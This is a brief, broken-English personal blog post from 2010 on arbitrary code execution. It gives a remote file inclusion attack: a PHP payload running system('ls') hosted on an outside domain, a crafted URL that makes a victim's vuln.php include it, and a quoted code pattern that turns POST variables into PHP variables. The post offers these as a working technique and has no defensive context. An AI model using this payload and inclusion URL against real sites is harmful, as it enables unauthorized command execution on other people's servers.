RSS Twitter MySpace Facebook Digg Flickr

Arbitrary Code Execution

Posted 29 July 2010 | /etc,BSD,Linux   

hm.. Arbitrary Code Execution :[

create malicious code in software like use ldd exploit or malicious function like libc mySQL

execute command on website
example :

< ?php system('ls'); exit; ? >

http://alko.web.id/example.txt

http://victim.com/vuln.php?path=http%3A%2F%2Falko.web.id%2Fexample.txt%3F

coz

if ($HTTP_POST_VARS) {
foreach ($HTTP_POST_VARS as $var => $value) {
$$var = $value;
}
}

not usually get profit like crash Opera 10.01 almost 8)

keyword

  • arbitrary code execution (1)

    • If you enjoyed this post, make sure you subscribe to my RSS feed! or follow me on twitter
    Link to this post!

    Related Posts

    Leave a Reply

    :p 8) :lol: =( :8 ;) :(( :o: :[ :) :D :-| :-[) :bloody: :cool: :choler: :love: :oups: :aie: :beurk: